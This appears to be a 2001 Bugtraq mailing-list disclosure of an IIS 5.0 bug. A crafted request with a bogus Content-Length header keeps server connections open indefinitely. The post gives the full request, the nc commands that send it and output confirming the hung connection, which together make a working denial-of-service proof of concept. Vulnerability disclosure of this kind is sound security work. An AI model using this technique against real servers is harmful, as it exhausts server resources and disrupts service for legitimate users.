[23456] in bugtraq
Microsoft IIS/5 bogus Content-length bug.
daemon@ATHENA.MIT.EDU (Ivan Hernandez Puga)
Tue Dec 11 14:25:12 2001
Date: Tue, 11 Dec 2001 12:31:43 -0300
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Message-ID: <243C47087E9A9E4A86A2650B4E454EC19898@globalsis1.globalsis.com.ar>
content-class: urn:content-classes:message
From: "Ivan Hernandez Puga" <ivan.hernandez@globalsis.com.ar>
To: <focus-ms@securityfocus.com>
Cc: <bugtraq@securityfocus.com>
Content-Transfer-Encoding: 8bit
Let's say that it's a bug, not a security flaw, but probably can lead
into denial of service with some tweaking.
When you send a bad request to Microsoft IIS/5.0 server it gives you the
error and closes the connection, like when you fail to authenticate.
Well... let's take a look to a normal request:
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Authorization: Basic
And then let's add a "Content-Length: 5300643" field.
When you send the new request to the server ir hangs there waiting
something to happen and never closes the connection.
Let's try this:
$ cat " GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic" >bogus.txt
$ nc 192.168.0.10 80 <bogus.txt &
$ ps x
PID PPID PGID WINPID TTY UID STIME COMMAND
696 1 696 696 con 500 12:22:37 /usr/bin/bash
2464 696 2464 2464 con 500 12:23:56 /usr/bin/nc
2532 696 2532 1552 con 500 12:29:16 /usr/bin/ps
$ netstat -an |grep 192.168.0.10
TCP 192.168.0.4:2479 192.168.0.10:80 ESTABLISHED
Now you have a waiting open connection. You can open as much as you
want. The server never stops the connections and I have seen no timeout.
Well, I left this here.
Thanks for the time of reading
Ivan Hernandez
